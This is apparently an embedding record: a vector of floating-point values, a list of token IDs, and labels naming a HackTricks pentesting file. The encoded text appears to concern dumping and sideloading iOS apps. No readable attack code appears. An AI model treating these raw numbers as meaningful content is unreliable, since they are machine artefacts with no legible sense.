-0.0631391704082489, -0.8289152383804321, -0.07170522958040237, 0.22558411955833435, 0.6967310905456543, 0.46802330017089844, 0.5489299893379211, -0.22985674440860748, -0.2403011918067932, 0.4868565499782562, 0.3628838360309601, 0.15173600614070892, 0.40774357318878174, 0.2871004045009613, 0.09821910411119461, -0.5320494174957275, -0.5062521696090698, 0.022401340305805206, 0.29774028062820435, 0.5261932015419006, 0.16256706416606903, 0.4343090355396271, -0.2545488476753235, -0.2785784602165222, 0.810081958770752, -0.30127763748168945, -1.3852260112762451, 0.6066657304763794, 0.10036841034889221, 0.6589806079864502, -0.21833908557891846, 0.501355767250061, -0.8079481720924377, -0.16548562049865723, 0.3057968020439148, 0.36915919184684753, -0.0650944709777832, -0.6946465969085693, -0.708235502243042, -0.3217372000217438, -0.11597387492656708, -0.18572112917900085, -0.28500157594680786, 0.06727714836597443, -0.7069082260131836, -0.8572447299957275, -0.9265396595001221, 0.40490925312042236, 0.5437980890274048, 0.36852365732192993, 0.7039291262626648, 0.08706696331501007, 0.4238462746143341, 0.001733094803057611, 0.05473419278860092, -0.787164032459259, 0.3595142364501953, 0.20834049582481384, 0.6037738919258118, -0.594595193862915, 0.004308870993554592, -0.2413897067308426, -0.4127892553806305, -0.5377817749977112, 0.12746436893939972, 0.307357519865036, -0.18501853942871094, -0.24498251080513, -0.4922313094139099, -0.18858110904693604, 0.20532932877540588, -0.28775110840797424, 0.05003844574093819, -0.014061817899346352, -0.04972636327147484, 0.5747811198234558, -0.8983696103096008, -0.4481048583984375, -0.5819477438926697, 0.17023417353630066, 0.3862128257751465, 0.2801283895969391, -0.1362539678812027, -0.42216986417770386, -0.6491699814796448, -0.49178436398506165, 0.09676618129014969, 0.5149832367897034, 0.49803343415260315, 0.05717217177152634, -1.101065754890442, -0.2992490828037262, 0.852375864982605, -0.690666139125824, -0.4791029989719391, -0.14439360797405243, 0.5658868551254272, 0.2938470244407654, 0.10598396509885788, -0.07621090859174728, -0.5007815957069397, 0.4022088050842285, -0.8745607733726501, 0.46405115723609924, -0.9015151262283325, -0.09007943421602249, -0.02876115031540394, -0.04329593852162361, 0.03144478797912598, 0.8427147269248962, -0.6417324542999268, 0.022427687421441078, -0.13377195596694946, 0.400287389755249, -0.19504831731319427, -0.3333257734775543, 0.31785279512405396, 0.2491694986820221, -0.5776705145835876, 0.2931729555130005, 0.35613030195236206, -0.06745951622724533, 0.6008999347686768, -0.27679795026779175, -0.25677409768104553, 0.7512288093566895, -0.43204066157341003, 0.8844008445739746, 0.21657660603523254, -0.07320762425661087, -0.13611382246017456, -0.41496774554252625, 0.6756042242050171, 0.3387672007083893, 0.4221407473087311, -0.7220812439918518, -0.6675689816474915, 0.27215173840522766, -0.33880484104156494, -0.26055076718330383, 0.5247887372970581, 0.20754699409008026, -0.3211953043937683, -0.36551547050476074, -0.39744529128074646, -0.4148910939693451, -0.5556197166442871, -0.3648785948753357, -0.2184414118528366, 0.019676486030220985, 0.23635350167751312, 0.5624257326126099, 0.06131234019994736, 0.042432256042957306, 0.4162198305130005, -0.3001015782356262, 0.3132924735546112, -0.7387301921844482, -0.3249921500682831, -0.18574495613574982, 0.3905212879180908, -0.3640969395637512, 0.4815484583377838, 0.25077739357948303, -0.07613446563482285, -0.41362515091896057, 0.004653113428503275, 0.2967645525932312, -0.4160425364971161, -0.9795787334442139, 0.6113168597221375, -0.27860984206199646, -0.1011190339922905, -0.306939035654068, 0.12851420044898987, -0.09342773258686066, 0.22180317342281342, 0.27703312039375305, -0.37813931703567505, -0.5323583483695984, -0.6307283639907837, 0.23557233810424805, -0.6299500465393066, 0.44861480593681335, -0.5780203342437744, -0.5488129258155823, -0.5068089365959167, 0.43163788318634033, 0.49579042196273804, -0.67906254529953, 0.4072810113430023, 0.017639731988310814, 0.22955577075481415, -0.07312324643135071, -0.4034050703048706, -0.5516841411590576, -0.8932792544364929, 0.1660877913236618, 0.6035900712013245, 0.16226893663406372, -0.9485820531845093, -0.027778027579188347, 0.018080484122037888, 0.3074629008769989, 0.033597178757190704, -0.7901603579521179, -0.58174729347229, -0.44372493028640747, -0.03651759773492813, -0.5768353939056396, 0.7900542616844177, -0.4314538836479187, 0.5015943050384521, -0.1093808263540268, 0.0097714988514781, 0.44010603427886963, -0.3151385486125946, -0.2535509169101715, -0.4718628525733948, 1.0355849266052246, -0.6021878719329834, -0.08739107102155685, -0.4030247926712036, 0.765516996383667, 0.5088359713554382, -0.24262869358062744, -1.1876195669174194, 0.5756304860115051, -0.6624289751052856, -1.031327247619629, 0.8492531180381775, -0.007511135656386614, 0.1160474494099617, -0.06737418472766876, 0.028389612212777138, 0.08856087177991867, 0.0333833321928978, 0.1716434359550476, 0.8735326528549194, 0.4499202072620392, 0.32973262667655945, -0.9743807911872864, 0.7954506278038025, 0.26033076643943787, -0.41861361265182495, 0.22604385018348694, -0.2779518961906433, 0.3507975935935974, 0.056493911892175674, -0.23968073725700378, -0.46645838022232056, -0.861652672290802, -0.852527379989624, 0.2881183922290802, 0.054682403802871704, 0.33845195174217224, 0.12375598400831223, -0.6759571433067322, 0.0210354533046484, -0.08093179017305374, -0.24141757190227509, -0.07722032070159912, 1.0444412231445312, 0.45589175820350647, -0.15579472482204437, -0.13107368350028992, 0.49801790714263916, 0.39225804805755615, 0.04491296038031578, 0.5390835404396057, 0.15372030436992645, -0.8009198904037476, 0.9955691695213318, 0.5158674716949463, -0.8112144470214844, -0.4720647633075714, -0.6969140768051147, -0.616738498210907, 0.047406651079654694, -0.13366392254829407, -0.10870296508073807, 0.0734931007027626, -0.3849683403968811, 0.11307034641504288, 0.9597249627113342, -0.49966317415237427, 0.157920241355896, -1.0255274772644043, 0.5651519298553467, 0.408702552318573, -0.06629474461078644, 0.46107757091522217, -1.1556614637374878, -0.8652732372283936, -0.6204502582550049, 0.1965155303478241, -0.07330157607793808, 0.028823545202612877, 0.6726431250572205, 0.17777609825134277, 0.7026618123054504, 0.05340021103620529, 0.2832391858100891, 0.2990899682044983, -0.07597881555557251, 0.22673466801643372, 0.3368016481399536, -0.2623497247695923, -0.8042430281639099, -0.689548134803772, 0.16673052310943604, 0.015475533902645111, 0.4625639319419861, -0.27699726819992065, -0.6596553325653076, -0.2293647676706314, 0.22757010161876678, -0.16286404430866241, -0.7984569668769836, -1.0605822801589966, -0.7112177014350891, -0.03690148517489433, 0.017605317756533623, -0.2758830487728119, -0.23960205912590027, 0.268177330493927, -0.2242584526538849, -0.2235700935125351, -0.2076280117034912, 0.5331777334213257, -0.3705211281776428, 0.35772591829299927, -0.561555027961731, 0.313667356967926, -0.42326462268829346, -0.8376545906066895, -0.16163231432437897, -0.19539828598499298, -0.3729252815246582, -0.46108755469322205, -0.5837135314941406, 0.0183627400547266, -0.7015891671180725, 0.4693669080734253, -0.45902711153030396, -0.4231257736682892, 0.08768890053033829, -0.37827542424201965, 0.00132863933686167, 0.7604399919509888, -0.47428444027900696, 0.04432389885187149, -0.15272298455238342, 0.13622376322746277, 0.45625752210617065, -0.8234163522720337, 0.543645441532135, 0.13251101970672607, -0.13508519530296326, 0.01454907190054655, -0.06562374532222748, -0.20557233691215515, 0.03086157701909542, 0.19913402199745178, -0.8138855695724487, -0.2840937077999115, -0.7995308041572571, -0.18724878132343292, -0.5486363768577576, -0.4211941659450531, -0.18634411692619324, 1.0479079484939575, 0.25827455520629883, 0.11866801232099533, -0.7183718681335449, 0.7520990967750549, 0.3095642924308777, 0.39552298188209534, 0.30418500304222107, 0.45818227529525757, 0.30990973114967346, -0.30571573972702026, -0.3371131420135498, 0.40099823474884033, -0.49444514513015747, 0.1638948917388916, 0.07027284801006317, -0.14007055759429932, -0.28597742319107056, 0.039392001926898956, 0.6140320897102356, 0.23589609563350677, 0.5331529378890991, -0.13562698662281036, 0.1375928521156311, -0.2966688573360443, -0.9012050032615662, -0.049938738346099854, -1.1418761014938354, -0.21518290042877197, 0.07647896558046341, -0.07123685628175735, -0.4306288957595825, -0.10481595247983932, -0.14989915490150452, 0.10506155341863632, 0.3071525990962982, 0.027034487575292587, 0.3045412600040436, -0.1172279492020607, -0.41231852769851685, 0.7637996077537537, -0.3161233961582184, -0.44523075222969055, -0.2927168607711792, 0.42036110162734985, -0.36301055550575256, -0.8738494515419006, 0.28215479850769043, 0.7715288400650024, 0.410915732383728, -0.3408491909503937, -0.12866617739200592, 0.04269510507583618, 0.432395875453949, 0.4664037525653839, 0.8295713663101196, 0.4636636972427368, -1.1599695682525635, 1.0307493209838867, -0.1362188309431076, 0.3194611966609955, 0.052826933562755585, 0.18835079669952393, 0.11256761848926544, 0.310008704662323, -0.3076651394367218, 0.665947675704956, -0.11917846649885178, 0.10965908318758011, 0.834052562713623, 0.6082726716995239, 0.8760250806808472, -0.36307716369628906, -0.2046281397342682, -0.30945488810539246, 0.5324193835258484, -0.25375843048095703, 0.42739591002464294, -0.32871687412261963, -0.10807010531425476, 0.6747326254844666, -0.6977248191833496, -0.046699926257133484, 0.09115653485059738, -0.13662849366664886, -0.1596786081790924, -0.14891764521598816, -0.23743316531181335, -0.34249454736709595, 0.2315063774585724, -0.2323605865240097, 0.29607999324798584, -0.14277826249599457, 0.3415203094482422, 0.29608336091041565, 0.11868757009506226, 1.0977338552474976, -0.5921468734741211, 0.7618070840835571, 0.3612062931060791, -0.09374810755252838, -0.1503933221101761, -0.06803221255540848, -0.7908453345298767, 0.13470935821533203, 0.7580410838127136, 0.38227763772010803, -0.20703494548797607, 0.8816061615943909, 0.07278670370578766, 0.44169989228248596, 0.7026293873786926, -0.3672347664833069, -0.6314070820808411, 0.08971178531646729, 0.35493865609169006, -0.6069670915603638, -0.8106863498687744, -0.09661227464675903, 0.30564895272254944, -0.5911621451377869, 0.5278229117393494, -0.2994752526283264, 0.05364733934402466, -0.5533915162086487, 0.11999277770519257, -0.07396452128887177, 0.4893459975719452, 0.3685222864151001, -0.590219259262085, -0.8434557318687439, 0.5149756669998169, 0.05714881047606468, 0.42926496267318726, -0.176282599568367, 1.151707649230957, 0.1079569086432457, 0.19534587860107422, 0.062118325382471085, -0.6054588556289673, 0.06306926906108856, -0.07420273125171661, -0.014884140342473984, -0.1917046159505844, -0.031441766768693924, -0.5448888540267944, 0.916834831237793, -0.15382853150367737, -0.3647928833961487, -0.8797721862792969, -0.1940467357635498, -0.4417414367198944, -0.6341550946235657, 0.47806552052497864, -0.16887550055980682, -0.723267138004303, -0.29012593626976013, 0.2447732836008072, 0.26409459114074707, 0.21380296349525452, -0.5332784652709961, -0.23112039268016815, -0.08396437764167786, -0.06439726799726486, -0.10617019981145859, 1.1297584772109985, -0.49105843901634216, -0.221149742603302, 0.0740470215678215, -0.3981359004974365, -0.3307013511657715, 0.11104455590248108, -0.5766280293464661, -0.4757538437843323, 0.24341677129268646, 0.05252504721283913, 0.6624280214309692, 0.4909249544143677, -0.07448922097682953, -0.37384799122810364, -0.2129366397857666, 0.6686393618583679, -0.5933972001075745, 0.906440258026123, 0.34111863374710083, 0.21101467311382294, 0.19481632113456726, -0.10130298137664795, 0.5471398234367371, -0.24399875104427338, -0.14011776447296143, -0.2710285186767578, 0.20522156357765198, -0.6230753660202026, -0.23091992735862732, -0.2493138462305069, -0.1964035928249359, 0.28860169649124146, -0.32625508308410645, -0.8452677726745605, 0.7082567811012268, -0.7423564791679382, 0.17117653787136078, -0.07742105424404144, -0.2580931484699249, 0.5038931369781494, -0.26034578680992126, 0.3899206221103668, -1.4816722869873047, 4.482829570770264, 0.22946713864803314, -0.4955660402774811, 0.33163389563560486, 0.23318104445934296, 0.22286388278007507, 1.523730754852295, -0.6055542826652527, 0.2290530502796173, -0.056365761905908585, -0.28190234303474426, -0.4026116728782654, 0.2557465434074402, 0.0847054123878479, 0.2947356402873993, 0.21549715101718903, -0.4256567060947418, 0.5738893151283264, 0.32395926117897034, -0.565321683883667, -1.1392370462417603, 0.2036699801683426, 0.14088766276836395, 0.857248067855835, 0.31671369075775146, 0.23238815367221832, 0.2759074866771698, -0.5687419772148132, 0.3836743235588074, -0.21640703082084656, 0.5771498680114746, -0.5257483720779419, 0.20530284941196442, -0.6502798795700073, -0.6956532597541809, 0.3104862868785858, 0.19438999891281128, -0.40856418013572693, -0.0992739349603653, 0.08970702439546585, 0.513444721698761, 0.3607368469238281, 0.6316432356834412, -0.26734673976898193, 0.09401749819517136, 0.7309473156929016, -0.9054970145225525, 0.32269158959388733, 0.8261675834655762, -0.47528398036956787, 0.6003636717796326, 0.3141730725765228, 0.7669205069541931, -0.08222168684005737, -0.4424668252468109, -0.01650356687605381, -0.0034401947632431984, -0.37530121207237244, 0.09453319758176804, -0.14630058407783508, 0.5835115313529968, -0.4780251681804657, 0.13278739154338837, -0.35802221298217773, -0.8982194066047668, -0.1815616637468338, -0.24662941694259644, 0.05758088082075119, 0.6514052748680115, -0.06352528184652328, -0.2768057882785797, 0.4013177156448364, -0.5759530067443848, -0.7922901511192322, 1.0726994276046753, -0.009734653867781162, 0.00035969377495348454, 0.06281544268131256, 0.27818283438682556, -0.35270172357559204, 0.16196678578853607, -0.7459620237350464, -1.0748320817947388, -0.16488778591156006, 1.191978931427002, 0.401152640581131, -0.13038958609104156, -1.1898763179779053, 0.1751270294189453, 0.07484859228134155, 0.5103480219841003, -0.24088363349437714, 0.14818906784057617, 0.5443887114524841, -0.16867530345916748 ]
[ 2000, 2224, 23951, 8566, 8737, 1024, 26794, 16500, 14101, 4895, 5831, 28400, 18150, 24471, 2140, 1011, 1052, 1013, 2149, 2099, 1013, 2334, 1013, 8026, 1025, 10381, 5302, 2094, 1009, 1060, 1013, 2149, 2099, 1013, 2334, 1013, 8026, 1013, 23951, 8566, 8737, 21031, 2595, 8566, 8737, 2862, 1001, 2862, 18726, 21031, 2595, 8566, 8737, 15653, 10474, 1012, 10439, 1001, 3443, 1012, 24531, 5371, 2013, 10439, 16078, 3676, 4801, 3388, 2178, 10424, 8524, 2241, 10439, 11703, 2854, 13876, 2953, 1012, 5942, 7173, 29162, 16380, 5080, 1998, 10424, 8524, 1012, 2128, 16078, 3676, 2243, 1011, 1011, 6315, 18546, 2099, 2475, 10258, 4904, 2818, 2099, 2475, 10258, 4904, 2818, 2003, 1037, 6994, 2008, 3594, 7217, 2063, 1998, 10424, 8524, 2000, 11703, 2854, 13876, 1998, 15653, 16380, 18726, 1028, 2156, 1996, 21025, 2705, 12083, 2005, 2062, 2592, 1012, 23658, 18726, 2860, 10222, 2017, 16500, 2019, 4646, 2302, 2478, 6207, 1005, 1055, 10439, 3573, 1010, 2023, 2003, 2170, 2217, 18570, 1012, 2045, 2024, 2536, 3971, 1997, 2217, 18570, 2029, 2024, 2649, 2917, 1012, 2006, 1996, 16380, 5080, 1010, 1996, 5025, 8272, 2832, 2003, 2059, 8971, 2011, 1996, 16500, 2094, 12828, 1010, 2029, 2097, 4895, 23947, 1998, 16500, 1996, 4646, 1012, 2000, 17409, 10439, 2578, 2030, 2022, 5361, 2006, 2019, 16380, 5080, 1010, 2035, 5097, 2442, 2022, 2772, 2007, 1037, 8196, 3843, 2011, 6207, 1012, 2023, 2965, 2008, 1996, 4646, 2064, 2022, 5361, 2069, 2044, 3144, 3642, 8085, 22616, 1012, 2006, 1037, 7173, 29162, 3042, 1010, 2174, 1010, 2017, 2064, 25022, 11890, 2819, 15338, 2023, 3036, 3444, 2007, 18726, 6038, 2278, 1010, 1037, 7427, 2800, 1999, 1996, 22330, 9032, 3573, 1012, 2009, 3397, 3365, 6179, 5097, 2008, 21155, 7173, 23890, 1011, 3024, 7117, 14310, 2000, 15389, 3935, 15380, 1012, 18726, 6038, 2278, 2003, 1037, 1056, 8545, 4817, 2008, 13864, 16500, 2094, 1010, 4352, 1996, 8272, 1997, 8275, 1011, 2772, 24531, 14555, 1012, 2367, 4725, 4839, 2005, 23658, 2019, 24531, 7427, 3031, 2019, 16380, 5080, 1010, 2029, 2024, 2649, 1999, 6987, 2917, 1012, 3531, 3602, 2008, 11943, 2003, 2053, 2936, 2800, 1999, 6097, 2891, 22326, 1012, 2065, 2017, 2024, 2478, 2019, 3080, 2544, 1997, 6097, 2891, 1010, 11943, 2003, 2145, 2800, 2021, 2144, 11943, 2260, 1012, 1021, 2009, 2003, 2025, 2825, 2000, 16500, 18726, 1012, 22330, 9032, 4254, 2953, 5666, 9032, 4254, 2953, 2001, 2761, 2580, 2000, 7173, 23890, 18059, 2015, 1010, 2021, 2038, 2042, 2128, 15773, 2000, 3696, 1998, 16500, 24531, 14555, 2000, 16380, 5733, 3081, 2217, 18570, 1006, 1998, 2130, 9706, 2243, 6764, 2000, 11924, 5733, 1007, 1012, 22330, 9032, 4254, 2953, 2003, 2800, 2005, 3645, 1010, 6097, 2891, 1998, 11603, 1012, 1037, 3357, 2011, 3357, 5009, 1998, 13460, 23416, 2075, 4084, 2024, 2800, 2006, 8038, 7630, 3900, 4014, 23890, 1012, 5658, 1012, 5622, 5638, 17751, 24844, 6610, 2239, 11603, 1998, 2036, 6097, 2891, 1010, 2017, 2064, 14084, 2224, 5622, 5638, 17751, 24844, 6610, 1010, 1037, 2892, 1011, 4132, 4007, 8778, 3075, 1998, 1037, 2275, 1997, 5906, 2005, 3128, 4807, 2007, 16380, 5733, 1012, 2023, 4473, 2017, 2000, 16500, 18726, 2058, 1037, 18833, 4434, 2011, 23448, 8909, 17726, 12377, 9153, 10820, 1012, 1996, 4434, 2003, 7528, 2007, 1996 ]
hack_tricks
436.txt
8